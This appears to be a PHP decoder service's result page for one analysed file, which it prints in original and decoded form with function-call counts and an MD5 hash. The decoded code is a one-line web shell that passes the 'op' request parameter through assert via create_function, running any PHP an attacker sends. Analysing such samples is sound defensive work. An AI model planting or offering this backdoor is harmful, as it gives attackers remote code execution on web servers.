Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);')..

Decoded Output download

<?php 
  mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['op']); 
?>

Did this file decode correctly?

Original Code

<?php
  mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['op']);
?>

Function Calls

assert 1
create_function 1

Variables

None

Stats

MD5 70baf1db013ff9bb4a49b55046377c74
Eval Count 1
Decode Time 113 ms